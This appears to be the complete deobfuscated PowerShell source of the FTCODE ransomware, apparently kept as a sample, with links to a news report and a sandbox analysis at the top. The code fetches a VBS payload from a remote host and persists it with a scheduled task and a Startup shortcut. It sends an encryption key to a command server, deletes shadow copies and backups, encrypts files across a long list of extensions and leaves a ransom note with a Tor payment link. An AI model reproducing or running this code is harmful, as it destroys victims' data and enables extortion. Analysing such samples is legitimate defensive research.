<# FTCODE ransomware https://twitter.com/matte_lodi/status/1181124751160422401 https://www.bleepingcomputer.com/news/security/ftcode-powershell-ransomware-resurfaces-in-spam-campaign/ https://app.any.run/tasks/aab1ffcb-98e3-4bc9-9be2-5e82fe528484 #> function dywxjbzzg() { $hjtjyuwxz = $env:PUBLIC + "\Libraries" if ( - not (Test - Path $hjtjyuwxz)) { md $hjtjyuwxz; } $ivvbdgxjdg = $hjtjyuwxz + "\WindowsIndexingService.vbs"; $dbugtxcs = New - Object System.Net.WebClient; $dbugtxcs.Credentials = [System.Net.CredentialCache]::DefaultCredentials; try { $uceycjf = Join - Path $hjtjyuwxz ( get - random - minimum 100 - maximum 999999 ); $dbugtxcs.DownloadString("http://home.healthiestu.com/?need=6ff4040&vid=dpec6&") | out - file $uceycjf; Start - Sleep - s 5; if ( ( test - path - path $uceycjf ) - and ( ( (Get - Item $uceycjf).length/1KB) -gt 5 ) ){ Move-Item $uceycjf -destination $ivvbdgxjdg -Force; $fagtzcgfg = (schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 13 /du 23:59 / TR $ivvbdgxjdg); try { $uyuhszzt = [Environment]::GetFolderPath('Startup') + '\WindowsApplicationService.lnk'; if ( - not ( Test - Path $uyuhszzt ) ) { $cibauhvg = New - Object - ComObject ('WScript.Shell'); $vhvwiyeuxd = $cibauhvg.CreateShortcut( $uyuhszzt ); $vhvwiyeuxd.TargetPath = $ivvbdgxjdg; $vhvwiyeuxd.WorkingDirectory = $hjtjyuwxz; $vhvwiyeuxd.WindowStyle = 1; $vhvwiyeuxd.Description = 'Windows Application Service'; $vhvwiyeuxd.Save(); } } catch {}; } } catch {} }; dywxjbzzg; function hjgcwfsiei( $ifwxibhss ) { $dbugtxcs = New - Object System.Net.WebClient; $dbugtxcs.Credentials = [System.Net.CredentialCache]::DefaultCredentials; $dbugtxcs.Headers.Add("Content-Type", "application/x-www-form-urlencoded"); $dbugtxcs.Encoding = [System.Text.Encoding]::UTF8; try { $tafjssfc = $dbugtxcs.UploadString( "http://connect.hairsalonlongmont.com/", ("ver=$scwgygzdu&vid=dpec6&guid=$ijwctat&psver=" + ( ( (Get - Host).Version ).Major ) + "&" + $ifwxibhss) ); if ( $tafjssfc - eq "ok" ) { return $true; } } catch {}; return $false; }; function ddbjeajiiz( $ghhzgav ) { try { Start - Process - WindowStyle Hidden - FilePath "$env:comspec" - ArgumentList "/c $ghhzgav"; } catch {} }; function dwfuacxisj($xwfvsfb, $izhzdwi) { $yavhiujvsg = "BXCODE hack your system"; $bscdvvix = "BXCODE INIT"; $hygazadbij = new - Object System.Security.Cryptography.RijndaelManaged; $tzbhbhutb = [Text.Encoding]::UTF8.GetBytes($izhzdwi); $yavhiujvsg = [Text.Encoding]::UTF8.GetBytes($yavhiujvsg); $hygazadbij.Key = (new - Object Security.Cryptography.PasswordDeriveBytes $tzbhbhutb, $yavhiujvsg, "SHA1", 5).GetBytes(32); $hygazadbij.IV = (new - Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($bscdvvix) )[0..15]; $hygazadbij.Padding = "Zeros"; $hygazadbij.Mode = "CBC"; $fyyxdehdbx = $hygazadbij.CreateEncryptor(); $zudjbafz = new - Object IO.MemoryStream; $hzewbxas = new - Object Security.Cryptography.CryptoStream $zudjbafz, $fyyxdehdbx, "Write"; $hzewbxas.Write($xwfvsfb, 0, $xwfvsfb.Length); $hzewbxas.Close(); $zudjbafz.Close(); $hygazadbij.Clear(); return $zudjbafz.ToArray(); } $scwgygzdu = "1003.1"; $ijwctat = [guid]::NewGuid(); $zvjethg = $env:temp + "\AFX50058.tmp"; sc - Path $zvjethg - Value $(Get - Date); $bjiewwwwg = [Reflection.Assembly]::LoadWithPartialName('System.Security'); Add - Type - Assembly System.Web; $hjtjyuwxz = $env:PUBLIC + "\OracleKit"; if ( - not (Test - Path $hjtjyuwxz)) { md $hjtjyuwxz; } $jeuacfx = $hjtjyuwxz + "\w00log03.tmp"; if ( Test - Path $jeuacfx ) { hjgcwfsiei "status=exit_file"; exit; } else { sc - Path $jeuacfx - Value $ijwctat - Force; }; $uebvuvzztb = [Web.Security.Membership]::GeneratePassword(50, 4); [byte[]]$zhfvjij = [system.Text.Encoding]::Unicode.GetBytes($uebvuvzztb); $cffitahbbi = "BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg=="; $dtghzhtgz = New - Object System.Security.Cryptography.RSACryptoServiceProvider; $dtghzhtgz.ImportCspBlob([system.Convert]::FromBase64String($cffitahbbi)); $ueuzadcuga = [system.Convert]::ToBase64String($dtghzhtgz.Encrypt($zhfvjij, $false)); if ( ( hjgcwfsiei( "&ek=" + ([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( $uebvuvzztb ) )) ) ) ) { sc - Path $jeuacfx - Value $ijwctat - Force; } else { ri - Path $jeuacfx - Force; hjgcwfsiei "status=exit_answer"; exit; } sbyxvbzxuv = " All your files was encrypted! Yes, You can Decrypt Files Encrypted!!! our price 500 USD Your personal ID: $ijwctat 1. Download Tor browser - https://www.torproject.org/download/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$ijwctat 5. Follow the instructions on this page ***** Warning***** Do not rename files Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them) As evidence, we can for free back one file Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique. "; ddbjeajiiz('bcdedit /set ztcxebbwya bootstatuspolicy ignoreallfailures'); ddbjeajiiz('bcdedit /set ztcxebbwya recoveryenabled no'); ddbjeajiiz('wbadmin delete catalog -quiet'); ddbjeajiiz('wbadmin delete systemstatebackup'); ddbjeajiiz('wbadmin delete backup'); ddbjeajiiz('vssadmin delete shadows /all /quiet'); $ifggctxeja = 0; hjgcwfsiei ("status=start" ); $judcuxzwd = Get - PSDrive|Where - Object { $_.Free - gt 50000 } |Sort - Object - Descending; foreach($bdwwbwxtey in $judcuxzwd) { try { gci $bdwwbwxtey.root - Recurse - Include "*.sql", "*.mp4", "*.7z", "*.rar", "*.m4a", "*.wma", "*.avi", "*.wmv", "*.csv", "*.d3dbsp", "*.zip", "*.sie", "*.sum", "*.ibank", "*.t13", "*.t12", "*.qdf", "*.gdb", "*.tax", "*.pkpass", "*.bc6", "*.bc7", "*.bkp", "*.qic", "*.bkf", "*.sidn", "*.sidd", "*.mddata", "*.itl", "*.itdb", "*.icxs", "*.hvpl", "*.hplg", "*.hkdb", "*.mdbackup", "*.syncdb", "*.gho", "*.cas", "*.svg", "*.map", "*.wmo", "*.itm", "*.sb", "*.fos", "*.mov", "*.vdf", "*.ztmp", "*.sis", "*.sid", "*.ncf", "*.menu", "*.layout", "*.dmp", "*.blob", "*.esm", "*.vcf", "*.vtf", "*.dazip", "*.fpk", "*.mlx", "*.kf", "*.iwd", "*.vpk", "*.tor", "*.psk", "*.rim", "*.w3x", "*.fsh", "*.ntl", "*.arch00", "*.lvl", "*.snx", "*.cfr", "*.ff", "*.vpp_pc", "*.lrf", "*.m2", "*.mcmeta", "*.vfs0", "*.mpqge", "*.kdb", "*.db0", "*.dba", "*.rofl", "*.hkx", "*.bar", "*.upk", "*.das", "*.iwi", "*.litemod", "*.asset", "*.forge", "*.ltx", "*.bsa", "*.apk", "*.re4", "*.sav", "*.lbf", "*.slm", "*.bik", "*.epk", "*.rgss3a", "*.pak", "*.big", "*wallet", "*.wotreplay", "*.xxx", "*.desc", "*.py", "*.m3u", "*.flv", "*.js", "*.css", "*.rb", "*.png", "*.jpeg", "*.txt", "*.p7c", "*.p7b", "*.p12", "*.pfx", "*.pem", "*.crt", "*.cer", "*.der", "*.x3f", "*.srw", "*.pef", "*.ptx", "*.r3d", "*.rw2", "*.rwl", "*.raw", "*.raf", "*.orf", "*.nrw", "*.mrwref", "*.mef", "*.erf", "*.kdc", "*.dcr", "*.cr2", "*.crw", "*.bay", "*.sr2", "*.srf", "*.arw", "*.3fr", "*.dng", "*.jpe", "*.jpg", "*.cdr", "*.indd", "*.ai", "*.eps", "*.pdf", "*.pdd", "*.psd", "*.dbf", "*.mdf", "*.wb2", "*.rtf", "*.wpd", "*.dxg", "*.xf", "*.dwg", "*.pst", "*.accdb", "*.mdb", "*.pptm", "*.pptx", "*.ppt", "*.xlk", "*.xlsb", "*.xlsm", "*.xlsx", "*.xls", "*.wps", "*.docm", "*.docx", "*.doc", "*.odb", "*.odc", "*.odm", "*.odp", "*.ods", "*.odt" |% { try { $tssdvahsgi = [io.file]::Open($_, 'Open', 'ReadWrite'); if ($tssdvahsgi.Length - lt "40960") { $fizeigzsuu = $tssdvahsgi.Length } else { $fizeigzsuu = "40960" } [byte[]]$azwwezuyyz = new - object byte[] $fizeigzsuu; $asihybvzh = $tssdvahsgi.Read($azwwezuyyz, 0, $azwwezuyyz.Length); $tssdvahsgi.Position = '0'; $axshudetg = dwfuacxisj $azwwezuyyz $uebvuvzztb; $tssdvahsgi.Write($axshudetg, 0, $axshudetg.Length); $tssdvahsgi.Close(); $uhhzdshvj = $_.Name + ".FTCODE"; ren - Path $_.FullName - NewName $uhhzdshvj - Force; $yjxegdax = $_.DirectoryName + "\READ_ME_NOW.htm"; if (!(Test - Path $yjxegdax)) { sc - Path $yjxegdax - Value $sbyxvbzxuv - Force; sc - Path $zvjethg - Value $(Get - Date) - Force; } $ifggctxeja++; } catch {} } } catch {} } hjgcwfsiei ("status=done&res=$ifggctxeja");